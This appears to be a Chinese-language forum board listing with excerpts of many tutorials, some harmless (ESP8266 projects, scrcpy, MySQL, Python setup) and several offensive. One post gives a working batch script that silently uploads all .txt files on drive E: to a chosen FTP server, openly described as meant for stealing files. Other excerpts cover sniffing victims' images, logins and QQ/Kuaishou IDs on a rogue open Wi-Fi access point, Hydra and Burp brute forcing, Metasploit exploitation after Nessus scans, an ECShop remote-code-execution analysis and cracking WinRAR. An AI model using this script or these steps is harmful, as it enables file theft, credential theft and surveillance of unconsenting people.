建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
366个主题在此版面
-
笔者有时需要将手机屏幕内容投屏到PC端,用作演示。那么如何来做到这点呢? 准备手机一部USB数据线 安装scrcpy在kali中执行下面命令 apt-get install scrcpy 这样便完成了安装 使用首先开启手机的开发者模式--USB试调 通过USB连接电脑后,终端执行命令scrcpy即可 通过无线连接首先执行下面命令开启无线试调 adb tcpip 5555拔掉数据线后执行 adb connect 192.168.1.x:5555最好执行adb devices查看设备 同上,执行在终端中执行scrcpy即可连接手机。 其他如果有多个设备 scrcpy -s ip:5555如果无线比较卡加上参数-b 4m 限制码率,--max=fps限制帧率。 视频演示
-
- 0 篇回复
- 24 次查看
-
-
互联网时代,无论是个人还是企业都已经离不开网络。而网络安全问题却是企业中最薄弱的一环。除了一些知名的网络安全公司外,另外一些企业在网络安全领域几乎是0,本文将会为您阐述当前企业所面临的网络安全问题。 当前企业所面临的网络安全问题员工网络安全意识淡薄。缺乏专业的网络全运维人士。缺乏专业的IT专员。设备陈旧,能用就行。IT人员地位低,删库跑路时有发生。老板只顾赚钱,忽略细节问题。 企业网络安全——“内忧外患”内忧:公司内部发生的网络安全问题,如删库跑路,间谍等。 外患:来自外部的恶意攻击。 内忧通常都是员工计算机操作能力低下,操作失误,工作心态等问题导致的安全问题。 内忧之删库跑路 删库跑路原因无非有一下两点 员工存在报复心态员工失误操作 内忧之员工业务能力低下企业中,由于部分员工缺乏相应的安全知识和技能,导致设备中毒是常有的事。如要下载某个软件,不去官网下载而是直接去度娘下载。结果下载的软件全是广告推广程序。在或者有的员工喜欢在上班期间搞点小刺激,看会儿小片儿,结果下载的全是病毒。 外患常见的攻击方法基于WiFi的攻击 首先对目标公司进行信息收集,法人信息,公司地理位置,座机号码等信息。(小公司的座机号码一般都是宽带账号,利用座机号码打客服电话可以查看公司的宽带账号。) 破解WiFi 对于公司而言,一个万能钥匙拯救一切,因为员工都懒得输密码。要么都是很简单的那种密码。 那么问题来了,WiFi的信号范围都是有限的,我该如何连接WiFi呢。总不能跑到人家办公室吧? 如上,我们可以在这个范围内借助一些大功率无线网卡实现攻击。 通过WiFi…
-
- 0 篇回复
- 24 次查看
-
-
活生生的硬是把十几块钱的板子,变成了路由器。清单esp8266板子一个软件ESP8266Flasher 说明:先下载刷入的固件 esp8266 wifi中继固件 固件中0x00000.bin烧写到0x00000地址处,0x10000.bin文件烧写到0x10000地址处。 如图所示: 刷入完成后,会出现MYAP的ssid 连接后访问 192.168.4.1 进行配置 网速测试 优点和缺点 优点: 小巧方便,简单实用,最主要的是便宜哈~ 缺点: 效率低,容易掉线,网速慢。
-
- 0 篇回复
- 24 次查看
-
-
前言前不久有这样一个想法,就是自动运行一个脚本,上传PC里面的文件到我们自定的服务器。比如我们可以指定 上传U盘里面所有的word文档到我们的服务器,已达到窃取的目的。那么来看看是如何实现的吧!代码@Echo Off Echo open 服务器ip >ftp.up Echo 用户名>>ftp.up Echo 密码>>ftp.up Echo binary>>ftp.up Echo prompt>>ftp.up Echo lcd "E:\*.txt">>ftp.up Echo mput "E:\*.txt">>ftp.up Echo bye>>ftp.up FTP -s:ftp.up del ftp.up /q使用将文件代码另存为.bat文件,双击运行后会将E盘中的所有的txt文件上传到我们指定的服务器。
-
- 0 篇回复
- 24 次查看
-
-
设备清理esp8266开发版oled显示屏 电路图 这里我们使用GFX库来解决图片输入的问题。 牛刀小试,我们先输入文字试试display.setTextSize(1); // setTextSize applique est facteur d'échelle qui permet d'agrandir ou réduire la font display.setTextColor(WHITE); // La couleur du texte display.setCursor(0,0); // On va écrire en x=0, y=0 display.println("Hello, world!"); // un println comme pour écrire sur le port série display.setTextColor(BLACK, WHITE); // On inverse les couleurs, le fond devient noir display.println("Hello, world!"); // Vous pouvez changer à la volée de Font (pour cela vous devez la déclarer comme une librairie en début de projet, par exemple #i…
-
- 0 篇回复
- 24 次查看
-
-
清单esp8266开发版继电器(用去控制220v家庭电路),本实例用LED灯代替。电洛铁 焊锡 电线若干 电路图 实例代码#include <ESP8266WiFi.h> #include <WiFiClient.h> #include <ESP8266WebServer.h> #include <ESP8266mDNS.h> const char* ssid = "PDCN"; const char* password = "1234567890"; ESP8266WebServer server(80); String html = "<!DOCTYPE html><html lang=\"en\"><head><meta charset=\"UTF-8\"><title>Priess的小灯</title><body><a href=\"./pin?light=on\"><input type=\"button\" value=\"on\"></a> <a href=\"./pin?light=off\"><input type=\"button\" value=\"off\"></a></body></head></html>"; void pin(){ if(server.arg…
-
- 0 篇回复
- 24 次查看
-
-
hydra(thc hydra)是一个在线密码攻击工具。它在telnet、ssh、http、https、smb、snmp、smtp等实时服务上强制各种组合。hydra支持30+协议,包括支持SSL的协议。它通过使用用户列表和单词列表来指定服务上的攻击。hydra工作模式有4种:一个用户名和一个密码用户列表和一个密码一个用户名和密码列表用户列表和密码列表使用终端输入命令xhydra启动图形界面,当然也可以用hydra来启动命令行界面。 设置攻击目标和攻击服务 设置用户名字密码字典 设置超时 开始攻击
-
- 0 篇回复
- 24 次查看
-
-
memcached是一套分布式的高速缓存系统,由LiveJournal的Brad Fitzpatrick开发,但被许多网站使用。这是一套开放源代码软件,以BSD license授权发布。memcached缺乏认证以及安全管制,这代表应该将memcached服务器放置在防火墙后。 安装memcached分为服务器端和客户端 我们首先安装服务端 使用yum来安装memcached: yum install memcache*启动/usr/bin/memcached -d -l 127.0.0.1 -p 11211 -m 500 -u root参数说明:-d:守护进程。当从终端窗口退出的时候memcached还会继续运行 -l:指定ip地址,这里我们指定本地ip -p:指定端口号,端口号为11211 -m:分配内存,这里我分配了500M内存 -u:使用哪个用户运行memcached 客户端安装安装php-memcache 扩展 注意:笔者这里的PHP环境为7.1 wget https://github.com/websupport-sk/pecl-memcache/archive/NON_BLOCKING_IO_php7.zip unzip NON_BLOCKING_IO_php7.zip cd pecl-memcache-NON_BLOCKING_IO_php7/ /usr/local/Cellar/[email protected]/7.1.20/bin/phpize ./configure --enable-memcache --with-…
-
- 0 篇回复
- 24 次查看
-
-
首先我们先搭建一个AP,没加密的那种、能联网的那种。 。搭建方法比较多,可以参考我们以前的教程。这里不在多说。 对目标浏览网站图片的窃取在kali下,我们利用Driftnet即可! 执行命令: driftnet -i wlan0 对目标账号和密码的分析需要注意的是,这种方法只对http协议的网站有效。 我们筛选所有的post数据包http.request.method == "POST" 对目标QQ号分析对于电脑QQ而言,很简单。我们只需要分析qicq协议即可得到目标的QQ号。但是对于手机QQ由于用的协议不同,故而不能利用此种方法。通过对数据包的分析,我们可以利用对QQ空间的访问信息,获取目标QQ。 输入uin=进行报文筛选 对快手信息分析用同样的方式,我们利用关键词user_id进行报文筛选。 得到了下面一条信息 http://apissl.ksapisrv.com/rest/n/user/settings?mod=Xiaomi%28MI%208%20SE%29&appver=6.8.1.10783&isp=CTCC&lon=104.929677&language=zh-cn&sys=ANDROID_9&max_memory=256&ud=666153773&egid=DFP1556DD2EE54045D41BA2E3C68BEC77456F8373E79C118B684EC17B6FE6F18&oc=XIAOMI&sh=2244&net=…
-
- 0 篇回复
- 23 次查看
-
-
启动服务service nussusd start在浏览器中输入https://127.0.0.1:8834 ps会提示错误信息,这是因为https 证书的问题,点击高级选项,忽略或者添加证书即可。 如图,输入账号和密码,登录nussus 新建扫描点击右上角的new scan 设置目标地址 以及相应的插件是否开启(默认开启) 查看结果扫描完成后,点击刚才的项目。可以看到当前系统中漏洞情况。 漏洞利用看看windows中的一些高危漏洞。选择下方的编号。在msfconsole中搜索模块,利用即可。 利用成功效果
-
- 0 篇回复
- 23 次查看
-
-
dsniffdsniff 是一个密码侦测工具,他能够自动分析端口上收到的某些协议的数据包,并获取相应的密码。 dnisff 支持的协议有 FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL。 dsniff 使用dsniff [-c] [-d] [-m] [-n] [expression] 注意:这里所有的 expression 都是代表 TCPDUMP 的表达式,指定对哪些数 据包进行攻击 urlsnarfurlsnarf可以嗅探 HTTP 请求报文的内容,并以 CLF (Common Log Format)通用日志格式 输出 使用 urlsnarf[-n] [-i interface] [[-v] pattern[expression]] webspywebspy 指定一个要嗅探的主机,如果指定主机发送 HTTP 请求,打开网页,webspy 也会通 过 netscape 浏览…
-
- 0 篇回复
- 23 次查看
-
-
KodExplorer可道云,原名芒果云,是基于Web技术的私有云在线文档管理解决方案 。Kod,读音通code,意为“代码,编码”,中文名为“可道”。 用户只需通过简单环境搭建,即可使用KodExplorer快速完成私有云/私有网盘/在线文档管理系统的部署和搭建。KOD提供了类windows用户界面,延续了windows平台的操作逻辑和使用习惯,支持100余种文件格式的在线预览,使得用户的私有云产品可以拥有本地操作一样方便、快捷、安全的体验;为企业用户提供了了文件在线存储与管理、分享和跨平台访问、群组与权限、生产流转、审批存档等全生命周期的在线文档管理的解决方案。 配置环境service apache2 start service mysql start mysql -u root -p #登录数据库 create database kod #创建数据库kod进入网站更目录cd /var/www/html 下载最新版的kodcloud wget http://static.kodcloud.com/update/download/kodbox.1.15.zip unzip kodbox.1.15.zip && chmod -Rf 777 ./*浏览器访问树莓派的IP地址进行安装。 如果缺少相应的环境,安装缺少的即可。 最后利用刚才设置的信息,登录即可。
-
- 0 篇回复
- 23 次查看
-
-
一、前言:Nmap是一个非常实用的网络连接端扫描软件,适用于Linux、Windows、Mac三大主流平台。用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 二、主机发现:1.全面扫描/综合扫描 nmap -A 192.168.242.1 2.Ping扫描 nmap -sP 192.168.242.1/243.免ping扫描,穿透防火墙,避免被防火墙发现 nmap -P0 192.168.242.14.TCP SYN Ping扫描 nmap -PS -v 192.168.242.135nmap -PS80()端口,10-100 -v 192.168.242.135 (针对防火墙丢弃RST包) 5.TCP ACK Ping 扫描 nmap -PA -v 192.168.242.135UDP Ping 扫描 nmap -PU -v 192.168.242.135ICMP Ping Types 扫描 nmap -PU -v 192.168.242.135 (ICMP ECHO) nmap -PP -v 192.168.242.135 (ICMP 时间戳) nmap -PM -v 192.168.242.135 (ICMP 地址掩码)ARP Ping 扫描 nmap -PR -v 192.168.242.1列表扫描 nmap -sL -v 192.168.242.110.禁止方向域名解析 nmap…
-
- 0 篇回复
- 23 次查看
-
-
首先来看看效果 代码<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>css3-scanner</title> <style> .qr-scanner { position: relative; height: 200px; width: 200px; margin: 0px auto;/*此处为了居中*/ background:url("er.jpg"); background-repeat: no-repeat; } .qr-scanner .box { width: 30vw; height: 30vw; max-height: 30vh; max-width: 30vh; position: relative; left: 50%; top: 50%; transform: translate(-50%, -50%); overflow: hidden; border: 0.1rem solid rgba(0, 255, 51, …
-
- 0 篇回复
- 23 次查看
-
-
该漏洞产生的根本原因在于ECShop系统的user.php文件中,display函数的模板变量可控,导致注入,配合注入可达到远程代码执行的效果。使得攻击者无需登录等操作,直接可以获得服务器的权限。 首先从user.php文件入手,代码中可以看到,系统读取HTTP_REFERER传递过来的内容赋值给$back_act变量。接着以$back_act的值为参数,调用assign方法。 /* 用户登录界面 */ elseif ($action == 'login') { if (empty($back_act)) { if (empty($back_act) && isset($GLOBALS['_SERVER']['HTTP_REFERER'])) { $back_act = strpos($GLOBALS['_SERVER']['HTTP_REFERER'], 'user.php') ? './index.php' : $GLOBALS['_SERVER']['HTTP_REFERER']; } else { $back_act = 'user.php'; } } $captcha = intval($_CFG['captcha']); if (($captcha & CAPTCHA_LOGIN) && (!($cap…
-
- 0 篇回复
- 23 次查看
-
-
1.mysql的安装及卸载mysqld -install [服务名] 服务名称默认是mysql,若没有特殊需求 不建议修改 mysqld -remove [服务名] 或者 remove MYSQL(服务名) 2.mysql服务的启动和停止net start mysql net stop mysql3.登录MYSQLmysql -h主机地址 -u用户名 -p用户密码 (如连接远程数据库 :mysql -h192.168.xxx.xxx -uroot -p123) mysql -u用户名 -p用户密码(如连接本地数据库:mysql -uroot -p123) 4.显示命令:数据库版本信息:show variables like '%version%' 显示数据库列表 显示库中的数据表 use mysql;//打开数据库 show tables;显示数据表的结构: describe 表名;查看当前使用的数据库 select database();
-
- 0 篇回复
- 23 次查看
-
-
打开平台pikachu,点击token方爆破选项。随便输入账号和密码,并且用burp抓包。 我们利用以前破解的方式进行破解,提示如下! username=6666&password=666666&token=679625cb843f4ba37e630426334&submit=Login我们发现多了一个字段token=679625cb843f4ba37e630426334,抱着试一试的心态,我们按照原来的方式破解。 很遗憾,并没有跑出密码。 抽根烟 压压惊 我们按F12审查元素 表单中有一个hidden项,里面存的就是token。 如何破 开启burpsuite代理,抓取数据包。将请求包转送到Intruder(在内容处右键菜单中可以看到)。Attack type选择Pitchfork。将passwod和user_token设置攻击位置(attack position) 在options栏找到Grep - Extract,点击Add。 点击Refetch response,进行一个请求,即可看到响应报文,直接选取需要提取的字符串,上面的会自动填入数据的起始和结束标识。 点击“OK”返回,可以在列表中看到一个grep项。 返回payloads栏,payload 1 设置密码字典,payload 2 选择payload type为“Recursive grep”,然后选择下面的extract grep项即可。 然后 点击Start attack开始攻击,攻击成功 666666.png burp下载 …
-
- 0 篇回复
- 23 次查看
-
-
nikto是一款著名的web漏洞扫描神器,支持xss sql注入 web目录爬行 敏感目录 信息收集等常用的web漏洞的扫描和发现。 nikto基础使用扫描一个主机 nikto -h 192.168.123.66扫描指定端口 nikto -h 192.168.123.66 -p 80扫描保存结果 nikto -h 192.168.123.66 -p 80 -o bbskali.html 扫描结果 sql注入漏洞在后台登录页面发现sql注入漏洞,利用burp抓包,并进行sql注入。 burp抓包 利用sqlmap获取数据库
-
- 0 篇回复
- 23 次查看
-
-
漏洞介绍File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行,从而造成恶意操作。 根据不同的配置环境,文件包含漏洞分为如下两种情况: 1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。 2.远程文件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。 因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。 你可以通过“File Inclusion”对应的测试栏目,来进一步的了解该漏洞。 本地文件包含漏洞我们在网站的根目录新建一…
-
- 0 篇回复
- 23 次查看
-
-
KALI的磁盘加密是用LUKS(Linux Unified Key Setup)加密的,这个软件不是kali/debian/ubuntu上特有的,各版本的linux都支持,使用AES加密,格式和truecrypt是兼容的,可以在加密后的磁盘上创建任意文件系统,但是加密后的磁盘不能直接挂载,必须要将分区映射到/dev/mapper下,所以为了方便管理磁盘,操作系统安装时都采用了 LVM on LUKS的方式,也就是全盘加密并在上面创建lvm分区。 LUKS的特点: 简单,安全,高效 支持全盘或分区加密 加密密匙独立于密码,支持多个密码,可以直接更改密码,不需要重新加密磁盘或分区 底层加密,要先解密后才能加载文件系统 kali在安装是加密磁盘和LVM安装程序都自动搞好了,采用的是全盘加密,不用手动搞。改LUKS的解密密码,要先加一个新密码,在删除原来的旧密码即可。千万不要直接删除原来密码(别问我是怎么知道的 TT~) 添加新密码: cryptsetup luksAddKey /dev/sda5先输入已经存在的密码,通过认证后在输入要加的新密码。 移除旧密码: cryptsetup luksRemoveKey /dev/sda5之后输入要删除的密码就可以直接移除了。 如果系统只有一个密码时,也是可以删掉的,这时会提示: root@kali:~#cryptsetup luksRemoveKey /dev/sda5 Enter passphrase to be deleted: WARNING! This is the last keyslo…
-
- 0 篇回复
- 23 次查看
-
-
由于自学python3,需要在服务器上调试python程序。在centos中,自带有python2,因此需要经常安装python3。但是这里有一个坑,就是centos的yum是用python2写的,如果正常编译安装python3,那么yum就会直接挂了。为了方便以后编译安装python3,不用天天去网上找教程,准备写下这篇文章,供日后参考。首先连上服务器,看下python版本:python -V如图我们可以看到centos下,默认带有python2.7.5: 接下来我们开始安装python3。1 安装python3所需要的组件 yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel 2 备份现有的python2 cd /usr/bin mv python python.bak mv pip pip.bak3 下载并编译安装python3这篇文章我们选择最新的稳定版本3.6.5,如有更新可以自行去官网(https://www.python.org/downloads/source/)查找下载地址。 cd ~ && wget https://www.python.org/ftp/python/3.6.5/Python-3.6.5.tar.xz tar -xvJf Python-3.6.5.tar.xz cd Python-3.6.5 指定安装路径 ./configure pr…
-
- 0 篇回复
- 23 次查看
-
-
rar是一款强大的文件压缩工具,但是由于免费版存在弹窗广告极其恶心。如何去掉广告,用上绿色安全的压缩工具呢。实验环境winrar6.0ResourceHacker 首先到官网下载最新版的winrar,我这里以64位为例! 下载后,安装顺序安装winrar。安装完成后,运行rar我们便可以看到恶心的广告了! 破解度娘搜索下载ResourceHacker 找到winrar的安装路径,默认是C:\Program Files\WinRAR 把安装目录下的winrar.exe文件拖到ResourceHacker 在左侧目录里面找到String Table,打开后再找到80:2052 将1277行全部删掉 最后点击左上角File-Save As保存即可! 效果最后打开压缩文件,就没有恶心的广告啦!
-
- 0 篇回复
- 23 次查看
-
-
脚本参数SCRIPT SCAN: -sC: equivalent to --script=default --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts --script-args-file=filename: provide NSE script args in a file --script-trace: Show all data sent and received --script-updatedb: Update the script database. --script-help=<Lua scripts>: Show help about scripts. <Lua scripts> is a comma-separated list of script-files or script-categories. -sC 是指的是采用默认配置扫描,与--script=default参数等价 具体调用的函数列表包括 default NSE Category(https://nmap.o…
-
- 0 篇回复
- 23 次查看
-
-
kalilinux的图形界面和文本界面的切换 文件修改开机是否图形配置: 配置图行界面的文件是 vi /etc/default/grub 找到:GRUB_CMDLINE_LINUX_DEFAULT="quiet",应该是在第11行。 复制本行然后把quiet替换成text。 把本行注释掉(以免以后想改回来时不知道怎么改回来)。 保存后 执行sudo update-grub命令后 重启即可 如果想kali每次启动是文本模式可以修改如下文件: vi /etc/X11/default-display-manager 把里面内容/usr/sbin/gdm3改为false之后重启会以文本模式登录,想改回图形就把false还原回/usr/sbin/gdm3 快捷键切换(推荐):ctrl+alt+F1文本模式ctrl+alt+F7图形界面
-
- 0 篇回复
- 23 次查看
-
-
设备清单esp8266开发板oled (0.96)杜邦线 设备电路图 添加库u8g2库文件 项目一 Hello World/* HelloWorld.ino esp8266+oled项目实例 论坛:bbskali.cn 博客:blog.bbskali.cn */ #include <Arduino.h> #include <U8g2lib.h> #ifdef U8X8_HAVE_HW_SPI #include <SPI.h> #endif #ifdef U8X8_HAVE_HW_I2C #include <Wire.h> #endif U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/ D2, /* data=*/ D1, /* reset=*/ U8X8_PIN_NONE); // 此处 D1 D2是对应焊接的脚针 void setup(void) { u8g2.begin(); } void loop(void) { u8g2.clearBuffer(); // clear the internal memory u8g2.setFont(u8g2_font_ncenB08_tr); // choose a suitable font u8g2.drawStr(0,10,"Hello World!"); // write something to…
-
- 0 篇回复
- 23 次查看
-